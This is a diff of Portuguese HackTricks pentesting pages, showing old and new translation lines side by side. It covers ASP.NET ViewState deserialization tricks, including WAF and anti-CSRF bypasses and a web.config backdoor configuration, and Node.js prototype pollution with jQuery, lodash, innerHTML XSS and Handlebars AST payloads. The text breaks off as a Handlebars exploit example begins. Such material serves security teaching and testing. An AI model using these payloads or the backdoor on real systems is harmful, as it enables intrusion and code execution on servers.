* A aplicação use a versão do .NET Framework 4.0 ou abaixo; e
* O parâmetro `__VIEWSTATEGENERATOR` seja conhecido.
A seguinte captura de tela mostra a árvore de caminhos no IIS:
![](https://soroush.secproject.com/downloadable/images/aspnetviewstate/iis.png)
Você pode verificar [\[20\]](https://docs.microsoft.com/en-us/iis/get-started/planning-your-iis-architecture/understanding-sites-applications-and-virtual-directories-on-iis) se não estiver familiarizado com os termos de diretório virtual e aplicação no IIS.
Para gerar um ViewState para a URL acima, os argumentos `--path` e `--apppath` devem ser os seguintes:
```
--path=/dir1/vDir1/dir2/app1/dir3/app2/vDir2/dir4
--apppath=/app2/
```
Se não soubéssemos que "app2" era um nome de aplicativo, poderíamos usar **tentativa e erro para testar todos os nomes de diretório** na URL um por um até encontrar um ViewState que possa executar código no servidor (talvez obtendo uma solicitação DNS ou causando um atraso).
### Gerador
Nesse caso, o argumento `--generator` pode ser usado. O argumento `--isdebug` pode ser usado para verificar se o plugin também calcula o mesmo parâmetro `__VIEWSTATEGENERATOR` quando os argumentos `--path` e `--apppath` foram fornecidos.
## Explorando versões mais antigas
Nenhum gadget foi identificado para explorar o .NET Framework v1.1 no momento em que este post foi escrito.
Para explorar aplicativos que usam o .NET Framework v4.0 ou abaixo, pode ser usado o ramo YSoSerial.Net v2.0 [\[21\]](https://github.com/nccgroup/VulnerableDotNetHTTPRemoting/tree/master/ysoserial.net-v2) (originalmente desenvolvido como parte de outra pesquisa [\[22\]](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/march/finding-and-exploiting-.net-remoting-over-http-using-deserialisation/)). No entanto, este projeto suporta apenas um número limitado de gadgets e também requer que a caixa de destino tenha o .NET Framework 3.5 ou superior instalado.
## **Outras ferramentas**
Parece que o Immunity Canvas suporta a criação do parâmetro ViewState quando as chaves de validação e criptografia são conhecidas [\[29\]](https://vimeopro.com/user18478112/canvas/video/260982761). As seguintes ferramentas também foram lançadas coincidentemente na mesma época em que eu estava prestes a publicar meu trabalho, o que foi bastante surpreendente:
* [https://github.com/0xACB/viewgen](https://github.com/0xACB/viewgen) (escrito em Python)
* [https://github.com/Illuminopi/RCEvil.NET](https://github.com/Illuminopi/RCEvil.NET) (escrito em .NET)
Acredito que essas ferramentas atualmente **não diferenciam entre diferentes versões do** Framework .NET e visam a criptografia legada. Além disso, eles **não usam o parâmetro `ViewStateUserKey`** que pode estar em uso para impedir ataques CSRF.
# Dicas adicionais
## **Usando solicitações GET**
Também é possível enviar o parâmetro `__VIEWSTATE` na URL por meio de uma solicitação GET. O único fator limitante é o comprimento da URL que limita o tipo de gadgets que podem ser usados aqui.
## **Criptografia no Framework .NET anterior à versão 4.5**
Como mencionado anteriormente, o parâmetro `__VIEWSTATE` não precisa ser criptografado ao explorar o Framework .NET 4.0 e abaixo (testado na versão 2.0 até a versão 4.0), mesmo quando a propriedade `ViewStateEncryptionMode` foi definida como `Always`. O ASP.NET decide se o ViewState foi criptografado ou não, encontrando o parâmetro `__VIEWSTATEENCRYPTED` na solicitação (não precisa ter nenhum valor). Portanto, é possível enviar um ViewState não criptografado removendo o parâmetro `__VIEWSTATEENCRYPTED` da solicitação.
Isso também significa que a alteração da chave de descriptografia ou seu algoritmo não pode impedir os ataques quando a chave de validação e seu algoritmo foram roubados.
O parâmetro `__VIEWSTATE` pode ser criptografado para contornar quaisquer WAFs.
## **Contornando o mecanismo anti-CSRF (anti-XSRF)**
Uma página ASP.NET produz um erro quando um parâmetro `__VIEWSTATE` inválido é usado. No entanto, a página ainda pode receber suas entradas quando `Request.Form` é usado diretamente no código, por exemplo, usando `Request.Form["txtMyInput"]` em vez de `txtMyInput.Text`. **O ataque CSRF pode ser realizado removendo o parâmetro `__VIEWSTATE` da solicitação ou adicionando o parâmetro `__PREVIOUSPAGE` com um valor inválido**. Como o parâmetro `__PREVIOUSPAGE` é criptografado e formatado em base64 por padrão, mesmo fornecer um único caractere como seu valor deve causar um erro.
Isso pode resultar em contornar o mecanismo de proteção anti-CSRF que foi implementado definindo o parâmetro `Page.ViewStateUserKey`.
## **Uso do parâmetro ViewStateGenerator**
Quando o parâmetro `__VIEWSTATEGENERATOR` é conhecido, ele pode ser usado para os aplicativos ASP.NET que usam a versão 4.0 ou abaixo do Framework .NET para assinar um objeto serializado sem conhecer o caminho do aplicativo.
## **Divisão do ViewState para contornar WAFs**
É possível dividir o parâmetro `__VIEWSTATE` em várias partes quando a propriedade **`MaxPageStateFieldLength`** foi definida como um **valor positivo**. Seu valor **padrão** é **negativo** e significa que o parâmetro **`__VIEWSTATE`** **não pode ser dividido em várias partes**.
Isso pode ser útil para contornar alguns WAFs quando a divisão do ViewState é permitida.
## **Explorando o parâmetro EventValidation**
O parâmetro `__EVENTVALIDATION` e alguns outros parâmetros também são serializados de forma semelhante ao parâmetro `__VIEWSTATE` e podem ser direcionados da mesma forma. Explorar um problema de desserialização via `__EVENTVALIDATION` é mais restrito e requer:
* Uma solicitação POST
* Uma página ASP.NET que aceita parâmetros de entrada
* Um nome de parâmetro de entrada válido. Por exemplo, o parâmetro `myinput` na solicitação POST quando temos o seguinte código no lado do servidor:
```markup
<asp:TextBox runat="server" ID="myinput" />
```
O valor do parâmetro `__VIEWSTATE` pode estar vazio na solicitação ao explorar o parâmetro `__EVENTVALIDATION`, mas ele precisa existir.
A string `Purpose` usada pelo .NET Framework 4.5 e superior para criar uma assinatura válida é diferente com base no parâmetro usado. A tabela a seguir mostra as strings `Purpose` definidas no .NET Framework:
| **Parâmetro de entrada** | **String Purpose** |
| ------------------------------------------------------------ | -------------------------------------------------- |
| “\_\_VIEWSTATE” | WebForms.HiddenFieldPageStatePersister.ClientState |
| “\_\_EVENTVALIDATION” | WebForms.ClientScriptManager.EventValidation |
| P2 em P1\|P2 em “\_\_dv” + ClientID + “\_\_hidden” | WebForms.DetailsView.KeyTable |
| P4 em P1\|P2\|P3\|P4 em “\_\_CALLBACKPARAM” | WebForms.DetailsView.KeyTable |
| P3 em P1\|P2\|P3\|P4 em “\_\_gv” + ClientID + “\_\_hidden” | WebForms.GridView.SortExpression |
| P4 em P1\|P2\|P3\|P4 em “\_\_gv” + ClientID + “\_\_hidden” | WebForms.GridView.DataKeys |
A tabela acima mostra todos os parâmetros de entrada que podem ser visados.
## **Cuidado com o parâmetro PreviousPage**
Quando o parâmetro **`__PREVIOUSPAGE`** existe na solicitação com dados **inválidos**, a **aplicação** **não** **desserializa** o parâmetro **`__VIEWSTATE`**. Fornecer o parâmetro `__CALLBACKID` impede esse comportamento.
## **Confiabilidade de erros**
Como explicado anteriormente, às vezes usamos erros para verificar se um ViewState gerado é válido. O ASP.NET não mostra o erro de validação MAC por padrão quando um parâmetro `__VIEWSTATEGENERATOR` inválido é usado. Esse comportamento muda quando a propriedade `ViewStateUserKey` é usada, pois o ASP.NET não suprime mais os erros de validação MAC.
Além disso, as aplicações web ASP.NET podem ignorar os erros de validação MAC com a seguinte configuração, mesmo quando a propriedade `ViewStateUserKey` é usada:
```markup
<appSettings>
<add key="aspnet:AlwaysIgnoreViewStateValidationErrors" value="true" />
</appSettings>
```
# Web.config como uma porta dos fundos
Se os atacantes puderem **alterar** o arquivo **`web.config`** na raiz de uma aplicação, eles podem **executar facilmente código** no servidor. No entanto, incorporar uma porta dos fundos furtiva na aplicação pode ser uma boa escolha para um atacante. Isso pode ser feito **desabilitando a validação MAC** e definindo a propriedade `viewStateEncryptionMode` como `Always`. Isso significa que todas as páginas ASP.NET que não definem a propriedade `ViewStateEncryptionMode` como `Auto` ou `Never` sempre usam parâmetros ViewState criptografados. No entanto, como o **ViewState não usa o recurso de validação MAC, eles agora estão vulneráveis à execução remota de código por meio da desserialização de dados não confiáveis**. O seguinte mostra um exemplo:
```markup
<configuration>
<system.web>
<pages enableViewStateMac="false" viewStateEncryptionMode="Always" />
</system.web>
<appSettings>
<add key="aspnet:AllowInsecureDeserialization" value="false" />
</appSettings>
</configuration>
```
Outra opção para um site independente seria definir a seção `machineKey` com chaves e algoritmos arbitrários para impedir outros atacantes!
Deve-se notar que definir a propriedade `EnableViewState` como `False` não impede esse ataque, pois o ViewState ainda será analisado pelo ASP.NET.
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
**Confira a postagem incrível em** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)

287
pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
View file

@ -2,15 +2,15 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Participe do grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou do grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
@ -26,11 +26,11 @@ console.log(Object.create(null)); // prints an empty object
```
![](<../../../.gitbook/assets/image (360).png>)
Anteriormente, aprendemos que um Objeto em javascript é uma coleção de chaves e valores, então faz sentido que um objeto `null` seja apenas um dicionário vazio: `{}`
Anteriormente aprendemos que um Objeto em javascript é uma coleção de chaves e valores, então faz sentido que um objeto `null` seja apenas um dicionário vazio: `{}`
## Funções / Classes em Javascript <a href="#55dd" id="55dd"></a>
Em Javascript, os conceitos de classe e função são bastante inter-relacionados (a própria função atua como construtor para a classe e a natureza real não tem o conceito de "classe" em javascript). Vamos ver o seguinte exemplo:
Em Javascript, os conceitos de classe e função são bastante inter-relacionados (a função em si atua como o construtor para a classe e a natureza real não tem conceito de "classe" em javascript). Vamos ver o exemplo a seguir:
```javascript
function person(fullName, age) {
this.age = age;
@ -44,12 +44,11 @@ return this.fullName + " has age: " + this.age;
```javascript
var person1 = new person("Satoshi", 70);
```
```markdown
![](<../../../.gitbook/assets/image (362).png>)
## Protótipos em JavaScript <a href="#3843" id="3843"></a>
É importante notar que o atributo prototype pode ser alterado/modificado/excluído durante a execução do código. Por exemplo, funções podem ser adicionadas dinamicamente à classe:
Uma coisa a se observar é que o atributo prototype pode ser alterado/modificado/excluído ao executar o código. Por exemplo, funções para a classe podem ser adicionadas dinamicamente:
![](<../../../.gitbook/assets/image (363).png>)
@ -63,28 +62,27 @@ Funções da classe também podem ser modificadas (como `toString` ou `valueOf`
Em um programa baseado em protótipos, objetos herdam propriedades/métodos de classes. As classes são derivadas adicionando propriedades/métodos a uma instância de outra classe ou adicionando-os a um objeto vazio.
Note que, se você adicionar uma propriedade a um objeto que é usado como protótipo para um conjunto de objetos (como o myPersonObj), os objetos para os quais ele é o protótipo também recebem a nova propriedade, mas essa propriedade não é impressa a menos que seja especificamente chamada.
Observe que, se você adicionar uma propriedade a um objeto que é usado como protótipo para um conjunto de objetos (como o myPersonObj), os objetos para os quais ele é o protótipo também recebem a nova propriedade, mas essa propriedade não é impressa a menos que seja chamada especificamente.
![](<../../../.gitbook/assets/image (366).png>)
## Poluição de \_\_proto\_\_ <a href="#0d0a" id="0d0a"></a>
Você já deve ter aprendido que **todo objeto em JavaScript é simplesmente uma coleção de pares de chave e valor** e que **todo objeto herda do tipo Object em JavaScript**. Isso significa que, se você conseguir poluir o tipo Object, **cada objeto JavaScript do ambiente será poluído!**
Você já deve ter aprendido que **cada objeto em JavaScript é simplesmente uma coleção de pares chave e valor** e que **cada objeto herda do tipo Object em JavaScript**. Isso significa que se você conseguir poluir o tipo Object **cada objeto JavaScript do ambiente será poluído!**
Isso é bastante simples, você só precisa ser capaz de modificar algumas propriedades (pares de chave-valor) de um objeto JavaScript arbitrário, porque como cada objeto herda de Object, cada objeto pode acessar o esquema de Object.
```
Isso é bastante simples, você só precisa ser capaz de modificar algumas propriedades (pares chave-valor) de um objeto JavaScript arbitrário, porque como cada objeto herda de Object, cada objeto pode acessar o esquema de Object.
```javascript
function person(fullName) {
this.fullName = fullName;
}
var person1 = new person("Satoshi");
```
Do exemplo anterior, é possível acessar a estrutura do Object usando as seguintes maneiras:
A partir do exemplo anterior, é possível acessar a estrutura do Objeto usando os seguintes métodos:
```javascript
person1.__proto__.__proto__
person.__proto__.__proto__
```
Então, como mencionado anteriormente, se agora uma propriedade for adicionada ao esquema Object, todo objeto JavaScript terá acesso à nova propriedade:
Portanto, como mencionado anteriormente, se uma propriedade for adicionada ao esquema do Objeto, todos os objetos JavaScript terão acesso à nova propriedade:
```javascript
function person(fullName) {
this.fullName = fullName;
@ -101,9 +99,9 @@ Agora, cada objeto JS conterá as novas propriedades: a função `printHello` e
## poluição de protótipo
Esta técnica não é tão eficaz quanto a anterior, pois você não pode poluir o esquema do Objeto JS. Mas em casos onde a **palavra-chave `__proto__` é proibida, esta técnica pode ser útil**.
Esta técnica não é tão eficaz quanto a anterior, pois não é possível poluir o esquema do Objeto JS. Mas em casos em que a **palavra-chave `__proto__` é proibida, essa técnica pode ser útil**.
Se você consegue modificar as propriedades de uma função, pode modificar a propriedade `prototype` da função e **cada nova propriedade que você adicionar aqui será herdada por cada objeto criado a partir dessa função:**
Se você puder modificar as propriedades de uma função, poderá modificar a propriedade `prototype` da função e **cada nova propriedade que você adicionar aqui será herdada por cada objeto criado a partir dessa função:**
```javascript
function person(fullName) {
this.fullName = fullName;
@ -120,28 +118,28 @@ person1.newConstant //This now works and is "true"
person1.constructor.prototype.sayHello = function(){console.log("Hello");}
person1.constructor.prototype.newConstant = true
```
Neste caso, apenas os **objetos criados a partir da classe `person`** serão afetados, mas cada um deles agora **herdará as propriedades `sayHello` e `newConstant`**.
Neste caso, apenas os **objetos criados a partir da classe `person`** serão afetados, mas cada um deles agora irá **herdar as propriedades `sayHello` e `newConstant`**.
**Existem 2 maneiras de abusar da poluição de protótipo para envenenar TODOS os objetos JS.**
**Existem 2 maneiras de abusar da poluição de protótipos para contaminar TODOS os objetos JS.**
A primeira seria poluir a propriedade prototype do **Object** (como mencionado anteriormente, todo objeto JS herda deste):
A primeira seria poluir a propriedade prototype do **Object** (como mencionado anteriormente, todos os objetos JS herdam desta):
```javascript
Object.prototype.sayBye = function(){console.log("bye!")}
```
Se você conseguir fazer isso, cada objeto JS será capaz de executar a função `sayBye`.
A outra maneira é envenenar o protótipo de um construtor de uma variável dicionário como no exemplo a seguir:
A outra maneira é envenenar o protótipo de um construtor de uma variável de dicionário como no exemplo a seguir:
```javascript
something = {"a": "b"}
something.constructor.prototype.sayHey = function(){console.log("Hey!")}
```
Após executar esse código, **cada objeto JS poderá executar a função `sayHey`**.
Depois de executar esse código, **cada objeto JS será capaz de executar a função `sayHey`**.
## Poluindo outros objetos
### De uma classe para Object.prototype
Em um cenário onde você pode **poluir um objeto específico** e precisa **chegar a `Object.prototype`**, você pode procurá-lo com um código semelhante ao seguinte:
Em um cenário onde você pode **poluir um objeto específico** e precisa **chegar ao `Object.prototype`** você pode procurá-lo com algo como o seguinte código:
```javascript
// From https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/
@ -164,7 +162,7 @@ console.log(key1 + "." + key2)
```
### Poluição de elementos de array
Note que, assim como você pode poluir atributos de objetos em JS, se você tiver acesso para poluir um array, você também pode **poluir valores do array** acessíveis **por índices** (note que você não pode sobrescrever valores, então você precisa poluir índices que são de alguma forma usados, mas não escritos).
Observe que, assim como você pode poluir atributos de objetos em JS, se você tiver acesso para poluir um array, você também pode **poluir os valores do array** acessíveis **por índices** (observe que você não pode sobrescrever valores, então você precisa poluir índices que são de alguma forma usados mas não escritos).
```javascript
c = [1,2]
a = []
@ -174,9 +172,9 @@ b[0] //undefined
b[1] //"yolo"
c[1] // 2 -- not
```
### Poluição de elementos HTML
### Poluição de elementos Html
Ao gerar um elemento HTML via JS, é possível **sobrescrever** o atributo **`innerHTML`** para fazer com que ele escreva **código HTML arbitrário.** [Ideia e exemplo deste artigo](https://blog.huli.tw/2022/04/25/en/intigriti-0422-xss-challenge-author-writeup/).
Ao gerar um elemento HTML via JS, é possível **sobrescrever** o atributo **`innerHTML`** para fazer com que ele escreva **código HTML arbitrário**. [Idea and example from this writeup](https://blog.huli.tw/2022/04/25/en/intigriti-0422-xss-challenge-author-writeup/).
{% code overflow="wrap" %}
```javascript
@ -195,19 +193,19 @@ settings[root][ownerDocument][body][innerHTML]="<svg onload=alert(document.domai
### Exemplo Básico
Então, onde ocorre a poluição de protótipo? Acontece quando há um bug na aplicação que permite sobrescrever propriedades de `Object.prototype`. Como todo objeto típico herda suas propriedades de `Object.prototype`, podemos alterar o comportamento da aplicação. O exemplo mais comumente mostrado é o seguinte:
Então, onde está a poluição de protótipos? Isso acontece quando há um bug na aplicação que torna possível sobrescrever propriedades de `Object.prototype`. Como todo objeto típico herda suas propriedades de `Object.prototype`, podemos alterar o comportamento da aplicação. O exemplo mais comumente mostrado é o seguinte:
```javascript
if (user.isAdmin) { // do something important!}
```
Imagine que temos uma poluição de protótipo que torna possível definir `Object.prototype.isAdmin = true`. Então, a menos que a aplicação tenha atribuído explicitamente algum valor, `user.isAdmin` é sempre verdadeiro!
Imagine que temos uma poluição de protótipo que torna possível definir `Object.prototype.isAdmin = true`. Então, a menos que a aplicação atribua explicitamente algum valor, `user.isAdmin` será sempre verdadeiro!
![](https://research.securitum.com/wp-content/uploads/sites/2/2019/10/image-1.png)
Por exemplo, `obj[a][b] = value`. Se o atacante pode controlar o valor de `a` e `value`, então ele só precisa ajustar o valor de `a` para `__proto__` (em javascript, `obj["__proto__"]` e `obj.__proto__` são completamente equivalentes), então a propriedade `b` de todos os objetos existentes na aplicação será atribuída a `value`.
Por exemplo, `obj[a][b] = value`. Se o atacante puder controlar o valor de `a` e `value`, então ele só precisa ajustar o valor de `a` para `__proto__` (em JavaScript, `obj["__proto__"]` e `obj.__proto__` são completamente equivalentes) então a propriedade `b` de todos os objetos existentes na aplicação será atribuída a `value`.
No entanto, o ataque não é tão simples quanto o acima, de acordo com o [paper](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf), só podemos atacar quando uma das seguintes três condições for atendida:
No entanto, o ataque não é tão simples como o acima, de acordo com o [artigo](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript\_prototype\_pollution\_attack\_in\_NodeJS.pdf), só podemos atacar quando uma das seguintes três condições é atendida:
* Realizar merge recursivo
* Realizar mesclagem recursiva
* Definição de propriedade por caminho
* Clonar objeto
@ -221,7 +219,7 @@ customer.__proto__.toString = ()=>{alert("polluted")}
[prototype-pollution-to-rce.md](prototype-pollution-to-rce.md)
{% endcontent-ref %}
## Poluição de protótipo do lado do cliente para XSS
## Poluição de Protótipo do Lado do Cliente para XSS
{% content-ref url="client-side-prototype-pollution.md" %}
[client-side-prototype-pollution.md](client-side-prototype-pollution.md)
@ -229,30 +227,30 @@ customer.__proto__.toString = ()=>{alert("polluted")}
### CVE-201911358: Ataque de poluição de protótipo através do jQuery $ .extend
$ .extend, se manipulado incorretamente, pode alterar as propriedades do objeto `prototype` (o modelo dos objetos no aplicativo). Esse atributo aparecerá então em todos os objetos. Note que apenas a versão "profunda" (ou seja, g) do $ .extend é afetada.
$ .extend, se manipulado incorretamente, pode alterar as propriedades do objeto `prototype` (o modelo dos objetos no aplicativo). Este atributo então aparecerá em todos os objetos. Note que apenas a versão "profunda" (ou seja, g) do $ .extened é afetada.
Programadores frequentemente usam essa função para duplicar um objeto ou preencher novas propriedades a partir de um objeto padrão. Por exemplo:
Os programadores frequentemente usam essa função para duplicar um objeto ou preencher novas propriedades a partir de um objeto padrão. Por exemplo:
Podemos imaginar que `myObject` é um campo de entrada do usuário e é serializado no BD)
Podemos imaginar que `myObject` é um campo de entrada do usuário e é serializado no banco de dados)
Neste código, costumamos pensar que, ao executar, atribuirá o atributo `isAdmin` ao objeto recém-criado. Mas essencialmente, ele é atribuído diretamente a `{}` e então `{}.isAdmin` será `true`. Se após este código, realizarmos a seguinte verificação:
Neste código, frequentemente pensamos que, ao ser executado, atribuirá o atributo `isAdmin` ao objeto recém-criado. Mas essencialmente, ele é atribuído diretamente a `{}` e então `{}.isAdmin` será `true`. Se após este código, realizarmos a seguinte verificação:
```javascript
If (user.isAdmin === true) {
// do something for admin
}
```
Se o usuário ainda não existir (`undefined`), a propriedade `isAdmin` será procurada em seu objeto pai, que é o Objeto ao qual foi adicionado `isAdmin` com o valor `true` acima.
Se o usuário ainda não existir (`undefined`), a propriedade `isAdmin` será procurada em seu objeto pai, que é o Objeto adicionado `isAdmin` com o valor `true` acima.
Outro exemplo quando executado no JQuery 3.3.1:
Outro exemplo ao ser executado no JQuery 3.3.1:
```javascript
$.extend(true, {}, JSON.parse('{"__proto__": {"devMode": true}}'))
console.log({}.devMode); // true
```
Esses erros podem afetar muitos projetos Javascript, especialmente projetos NodeJS, o exemplo mais prático é o erro no Mongoose, a biblioteca JS que ajuda a manipular MongoDB, em dezembro de 2018.
Esses erros podem afetar muitos projetos Javascript, especialmente projetos NodeJS, o exemplo mais prático é o erro no Mongoose, a biblioteca JS que ajuda a manipular o MongoDB, em dezembro de 2018.
### CVE-20183721, CVE-201910744: Ataque de poluição de protótipo através do lodash
### CVE-20183721, CVE-201910744: Ataque de poluição de protótipos através do lodash
[Lodash](https://www.npmjs.com/package/lodash) é também uma biblioteca bem conhecida que fornece muitas funções diferentes, ajudando-nos a escrever código de forma mais conveniente e mais organizada com mais de 19 milhões de downloads semanais. E teve o mesmo problema que o JQuery.
[Lodash](https://www.npmjs.com/package/lodash) é também uma biblioteca bem conhecida que fornece muitas funções diferentes, nos ajudando a escrever código de forma mais conveniente e organizada, com mais de 19 milhões de downloads semanais. E teve o mesmo problema que o JQuery.
**CVE-20183721**
@ -264,135 +262,23 @@ Este bug afeta todas as versões do Lodash, já corrigido na versão 4.17.11.
{% embed url="https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2" %}
## Poluição de Protótipo AST
### Poluição de Protótipos AST no NodeJS
No NodeJS, AST é usado em JS com muita frequência, como motores de template e typescript etc.\
Para o motor de template, a estrutura é como mostrado acima.
O NodeJS utiliza extensivamente Árvores de Sintaxe Abstrata (AST) em JavaScript para funcionalidades como motores de template e TypeScript. Esta seção explora as vulnerabilidades relacionadas à poluição de protótipos nos motores de template, especificamente Handlebars e Pug.
![img](https://blog.p6.is/img/2020/08/graph_3.jpg)
#### Análise de Vulnerabilidade do Handlebars
### Handlebars
O motor de template Handlebars pode ser explorado para poluição de protótipos. A vulnerabilidade está principalmente dentro das funções `appendContent` e `pushSource` no arquivo `javascript-compiler.js`, onde `appendContent` concatena `pendingContent` se existir, e `pushSource` define `pendingContent` como `undefined` após empurrar o código fonte.
Informações retiradas de [https://blog.p6.is/AST-Injection/](https://blog.p6.is/AST-Injection/)
##### Processo de Exploração
Você pode inserir qualquer string em `Object.prototype.pendingContent` para determinar a possibilidade de um ataque.\
Isso permite que você tenha certeza de que servidores estão usando o motor handlebars quando existe uma poluição de protótipo em um ambiente de caixa-preta.
```javascript
<!-- /node_modules/handlebars/dist/cjs/handlebars/compiler/javascript-compiler.js -->
A exploração envolve a manipulação do AST gerado pelo Handlebars. O processo é o seguinte:
...
appendContent: function appendContent(content) {
if (this.pendingContent) {
content = this.pendingContent + content;
} else {
this.pendingLocation = this.source.currentLocation;
}
1. **Manipulação do Parser**: O parser, através do nó `NumberLiteral`, força os valores a serem números. No entanto, isso pode ser contornado pela poluição de protótipos, permitindo a inserção de strings não numéricas.
2. **Manipulação do Compilador**: O compilador aceita um Objeto AST ou uma string de template. Se `input.type` for `Program`, a entrada é considerada pré-parseada, levando a uma possível exploração.
3. **Injeção de Código**: Ao manipular `Object.prototype`, código arbitrário pode ser injetado na função de template, levando a uma possível execução remota de código.
this.pendingContent = content;
},
pushSource: function pushSource(source) {
if (this.pendingContent) {
this.source.push(this.appendToBuffer(this.source.quotedString(this.pendingContent), this.pendingLocation));
this.pendingContent = undefined;
}
if (source) {
this.source.push(source);
}
}
...
```
```markdown
Isso é feito pela função `appendContent` de `javascript-compiler.js`\
`appendContent` é assim. Se `pendingContent` estiver presente, anexa ao conteúdo e retorna.
`pushSource` faz com que o `pendingContent` se torne `undefined`, impedindo que a string seja inserida várias vezes.
**Exploração**
![img](https://blog.p6.is/img/2020/08/graph_5.jpg)
Handlebars funciona conforme mostrado no gráfico acima.
Após o lexer e o parser gerarem a AST, ela é passada para `compiler.js`\
Podemos executar a função de template gerada pelo compilador com alguns argumentos. E ela retorna a string como "Hello posix" (quando msg é posix)
```
```javascript
<!-- /node_modules/handlebars/dist/cjs/handlebars/compiler/parser.js -->
case 36:
this.$ = { type: 'NumberLiteral', value: Number($$[$0]), original: Number($$[$0]), loc: yy.locInfo(this._$) };
break;
```
O analisador no handlebars força o valor de um nó cujo tipo é NumberLiteral a ser sempre um número através do construtor Number. No entanto, você pode inserir uma string não numérica aqui usando a poluição de protótipo.
```javascript
<!-- /node_modules/handlebars/dist/cjs/handlebars/compiler/base.js -->
function parseWithoutProcessing(input, options) {
// Just return if an already-compiled AST was passed in.
if (input.type === 'Program') {
return input;
}
_parser2['default'].yy = yy;
// Altering the shared object here, but this is ok as parser is a sync operation
yy.locInfo = function (locInfo) {
return new yy.SourceLocation(options && options.srcName, locInfo);
};
var ast = _parser2['default'].parse(input);
return ast;
}
function parse(input, options) {
var ast = parseWithoutProcessing(input, options);
var strip = new _whitespaceControl2['default'](options);
return strip.accept(ast);
}
```
Primeiro, observe a função compile, que suporta duas formas de entrada, Objeto AST e string de template.
quando input.type é um `Program`, embora o valor de entrada seja na verdade uma string.\
O Parser considera que já é um AST analisado pelo parser.js e o envia para o compilador sem nenhum processamento.
```javascript
<!-- /node_modules/handlebars/dist/cjs/handlebars/compiler/compiler.js -->
...
accept: function accept(node) {
/* istanbul ignore next: Sanity code */
if (!this[node.type]) {
throw new _exception2['default']('Unknown type: ' + node.type, node);
}
this.sourceNode.unshift(node);
var ret = this[node.type](node);
this.sourceNode.shift();
return ret;
},
Program: function Program(program) {
console.log((new Error).stack)
this.options.blockParams.unshift(program.blockParams);
var body = program.body,
bodyLength = body.length;
for (var i = 0; i < bodyLength; i++) {
this.accept(body[i]);
}
this.options.blockParams.shift();
this.isSimple = bodyLength === 1;
this.blockParams = program.blockParams ? program.blockParams.length : 0;
return this;
}
```
O compilador, dado o Objeto AST (na verdade uma string), envia-o para o método `accept`.\
e `accept` chama `this[node.type]` do Compiler.\
Em seguida, pega o atributo body do AST e o utiliza para construir a função.
Exemplo de exploração da vulnerabilidade do Handlebars:
```javascript
